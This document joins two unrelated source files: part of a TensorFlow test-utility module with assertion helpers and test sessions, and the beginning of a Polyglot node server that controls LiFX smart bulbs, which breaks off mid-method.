Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(len(a_value.bytes_list.value),
len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(
a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, attr_tensor_string_value)):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 3, 1, 2],
5: [0, 4, 1, 2, 3]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 2, 3, 1],
5: [0, 2, 3, 4, 1]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
# pylint: disable=protected-access
def disable_c_api_wrapper(*args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = False
try:
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# pylint: disable=protected-access
return disable_c_api_wrapper
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
ops.reset_default_graph()
ops.get_default_graph().seed = random_seed.DEFAULT_GRAPH_SEED
def tearDown(self):
for thread in self._threads:
self.assertFalse(thread.is_alive(), "A checkedThread did not terminate")
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type %s and %s" %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves different than session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/gpu:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu and `use_gpu` are False, all ops are pinned to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/gpu:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/gpu:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/gpu:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/gpu:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/gpu:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
self.assertTrue(
math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
self.assertEqual(len(farray1), len(farray2))
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b), np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
np.testing.assert_allclose(b, a, rtol=rtol, atol=atol, err_msg=msg)
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays, or dicts of same, have near values.
This does not support nested dicts.
Args:
a: The expected numpy ndarray (or anything can be converted to one), or
dict of same. Must be a dict iff `b` is a dict.
b: The actual numpy ndarray (or anything can be converted to one), or
dict of same. Must be a dict iff `a` is a dict.
rtol: relative tolerance.
atol: absolute tolerance.
Raises:
ValueError: if only one of `a` and `b` is a dict.
"""
is_a_dict = isinstance(a, dict)
if is_a_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, %s vs %s." % (a, b))
if is_a_dict:
self.assertItemsEqual(
a.keys(), b.keys(),
msg="mismatched keys, expected %s, got %s" % (a.keys(), b.keys()))
for k in a:
self._assertArrayLikeAllClose(
a[k], b[k], rtol=rtol, atol=atol,
msg="%s: expected %s, got %s." % (k, a, b))
else:
self._assertArrayLikeAllClose(a, b, rtol=rtol, atol=atol)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(b, a)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
def create_local_cluster(num_workers, num_ps, protocol="grpc"):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs, job_name="worker", protocol=protocol, task_index=ix, start=True)
for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs, job_name="ps", protocol=protocol, task_index=ix, start=True)
for ix in range(num_ps)
]
return workers, ps_servers
|
lifx-poly.py
|
#!/usr/bin/env python3
##!/home/e42/dev/py3_envs/udi-lifx-poly-venv/bin/python
"""
LiFX NodeServer for UDI Polyglot v2
by Einstein.42 (James Milne) milne.james@gmail.com
"""
import polyinterface
import time
import sys
import lifxlan
from copy import deepcopy
import json
from threading import Thread
from pathlib import Path
LOGGER = polyinterface.LOGGER
BR_INCREMENT = 2620 # this is ~4% of 65535
BR_MIN = 1310 # minimum brightness value ~2%
BR_MAX = 65535 # maximum brightness value
FADE_INTERVAL = 5000 # 5s
BRTDIM_INTERVAL = 400 # 400ms
with open('server.json') as data:
SERVERDATA = json.load(data)
data.close()
try:
VERSION = SERVERDATA['credits'][0]['version']
except (KeyError, ValueError):
LOGGER.info('Version not found in server.json.')
VERSION = '0.0.0'
# Changing these will not update the ISY names and labels, you will have to edit the profile.
COLORS = {
0: ['RED', [62978, 65535, 65535, 3500]],
1: ['ORANGE', [5525, 65535, 65535, 3500]],
2: ['YELLOW', [7615, 65535, 65535, 3500]],
3: ['GREEN', [16173, 65535, 65535, 3500]],
4: ['CYAN', [29814, 65535, 65535, 3500]],
5: ['BLUE', [43634, 65535, 65535, 3500]],
6: ['PURPLE', [50486, 65535, 65535, 3500]],
7: ['PINK', [58275, 65535, 47142, 3500]],
8: ['WHITE', [58275, 0, 65535, 5500]],
9: ['COLD_WHTE', [58275, 0, 65535, 9000]],
10: ['WARM_WHITE', [58275, 0, 65535, 3200]],
11: ['GOLD', [58275, 0, 65535, 2500]]
}
class Controller(polyinterface.Controller):
def __init__(self, polyglot):
super().__init__(polyglot)
self.lifxLan = None
self.name = 'LiFX Controller'
self.discovery_thread = None
self.update_nodes = False
def start(self):
LOGGER.info('Starting LiFX Polyglot v2 NodeServer version {}, LiFX LAN: {}'.format(VERSION, lifxlan.__version__))
self._checkProfile()
self.discover()
LOGGER.debug('Start complete')
def stop(self):
LOGGER.info('Stopping LiFX Polyglot v2 NodeServer version {}'.format(VERSION))
def _checkProfile(self):
profile_version_file = Path('profile/version.txt')
if profile_version_file.is_file() and 'customData' in self.polyConfig:
with profile_version_file.open() as f:
profile_version = f.read().replace('\n', '')
f.close()
if 'prof_ver' in self.polyConfig['customData']:
if self.polyConfig['customData']['prof_ver'] != profile_version:
self.update_nodes = True
else:
self.update_nodes = True
if self.update_nodes:
LOGGER.info('New Profile Version detected: {}, all nodes will be updated'.format(profile_version))
cust_data = deepcopy(self.polyConfig['customData'])
cust_data['prof_ver'] = profile_version
self.saveCustomData(cust_data)
self.updateNode(self)
def shortPoll(self):
if self.discovery_thread is not None:
if self.discovery_thread.isAlive():
LOGGER.debug('Skipping shortPoll() while discovery in progress...')
return
else:
self.discovery_thread = None
for node in self.nodes:
self.nodes[node].update()
def longPoll(self):
if self.discovery_thread is not None:
if self.discovery_thread.isAlive():
LOGGER.debug('Skipping longPoll() while discovery in progress...')
return
else:
self.discovery_thread = None
for node in self.nodes:
self.nodes[node].long_update()
def update(self):
pass
def long_update(self):
pass
def discover(self, command=None):
self.lifxLan = lifxlan.LifxLAN()
if self.discovery_thread is not None:
if self.discovery_thread.isAlive():
LOGGER.info('Discovery is still in progress')
return
self.discovery_thread = Thread(target=self._discovery_process)
self.discovery_thread.start()
def _discovery_process(self):
LOGGER.info('Starting LiFX Discovery thread...')
try:
devices = self.lifxLan.get_lights()
bulbs_found = len(devices)
LOGGER.info('{} bulbs found. Checking status and adding to ISY if necessary.'.format(bulbs_found))
try:
old_bulbs_found = int(self.getDriver('GV0'))
except:
old_bulbs_found = bulbs_found
else:
if bulbs_found != old_bulbs_found:
LOGGER.info('NOTICE: Bulb count {} is different, was {} previously'.format(bulbs_found, old_bulbs_found))
self.setDriver('GV0', bulbs_found)
for d in devices:
label = str(d.get_label())
name = 'LIFX {}'.format(label)
address = d.get_mac_addr().replace(':', '').lower()
if not address in self.nodes:
if d.supports_multizone():
LOGGER.info('Found MultiZone Bulb: {}({})'.format(name, address))
self.addNode(MultiZone(self, self.address, address, name, d, label), update = self.update_nodes)
else:
LOGGER.info('Found Bulb: {}({})'.format(name, address))
self.addNode(Light(self, self.address, address, name, d, label), update = self.update_nodes)
gid, glabel, gupdatedat = d.get_group_tuple()
gaddress = glabel.replace("'", "").replace(' ', '').lower()[:12]
if not gaddress in self.nodes:
LOGGER.info('Found LiFX Group: {}'.format(glabel))
self.addNode(Group(self, self.address, gaddress, gid, glabel, gupdatedat), update = self.update_nodes)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('discovery Error: {}'.format(ex))
self.update_nodes = False
LOGGER.info('LiFX Discovery thread is complete.')
def all_on(self, command):
try:
self.lifxLan.set_power_all_lights("on", rapid=True)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('All On Error: {}'.format(str(ex)))
def all_off(self, command):
try:
self.lifxLan.set_power_all_lights("off", rapid=True)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('All Off Error: {}'.format(str(ex)))
def set_wf(self, command):
WAVEFORM = ['Saw', 'Sine', 'HalfSine', 'Triangle', 'Pulse']
query = command.get('query')
wf_color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
wf_period = int(query.get('PE.uom42'))
wf_cycles = int(query.get('CY.uom56'))
wf_duty_cycle = int(query.get('DC.uom56'))
wf_form = int(query.get('WF.uom25'))
if wf_form >= 5:
wf_transient = 1
wf_form -= 5
else:
wf_transient = 0
LOGGER.debug('Color tuple: {}, Period: {}, Cycles: {}, Duty cycle: {}, Form: {}, Transient: {}'.format(wf_color, wf_period, wf_cycles, wf_duty_cycle, WAVEFORM[wf_form], wf_transient))
try:
self.lifxLan.set_waveform_all_lights(wf_transient, wf_color, wf_period, wf_cycles, wf_duty_cycle, wf_form)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting Waveform for all lights: {}'.format(str(ex)))
def setColor(self, command):
_color = int(command.get('value'))
try:
self.lifxLan.set_color_all_lights(COLORS[_color][1], rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting all bulb color: {}'.format(str(ex)))
def setHSBKD(self, command):
query = command.get('query')
try:
color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
duration = int(query.get('D.uom42'))
LOGGER.info('Received manual change, updating all bulb to: {} duration: {}'.format(str(color), duration))
except TypeError:
duration = 0
try:
self.lifxLan.set_color_all_lights(color, duration=duration, rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting all bulb color: {}'.format(str(ex)))
drivers = [{'driver': 'ST', 'value': 0, 'uom': 2},
{'driver': 'GV0', 'value': 0, 'uom': 56}
]
id = 'controller'
commands = {'DISCOVER': discover, 'DON': all_on, 'DOF': all_off,
'SET_COLOR': setColor, 'SET_HSBKD': setHSBKD, 'WAVEFORM': set_wf
}
class Light(polyinterface.Node):
"""
LiFX Light Parent Class
"""
def __init__(self, controller, primary, address, name, dev, label):
super().__init__(controller, primary, address, name)
self.device = dev
self.name = name
self.power = False
self.label = label
self.connected = 1
self.uptime = 0
self.color= []
self.lastupdate = time.time()
self.duration = 0
def start(self):
try:
self.duration = int(self.getDriver('RR'))
except:
self.duration = 0
self.update()
self.long_update()
def query(self, command = None):
self.update()
self.long_update()
self.reportDrivers()
def update(self):
connected = 0
try:
self.color = list(self.device.get_color())
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
try:
self.power = True if self.device.get_power() == 65535 else False
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
if self.power:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
else:
self.setDriver('ST', 0)
self.connected = connected
self.setDriver('GV5', self.connected)
self.setDriver('RR', self.duration)
self.lastupdate = time.time()
def long_update(self):
connected = 0
try:
self.uptime = self._nanosec_to_hours(self.device.get_uptime())
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb uptime. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.setDriver('GV6', self.uptime)
if self.device.supports_infrared():
try:
ir_brightness = self.device.get_infrared()
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb Infrared. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.setDriver('GV7', ir_brightness)
else:
self.setDriver('GV7', 0)
try:
wifi_signal = self.device.get_wifi_signal_mw()
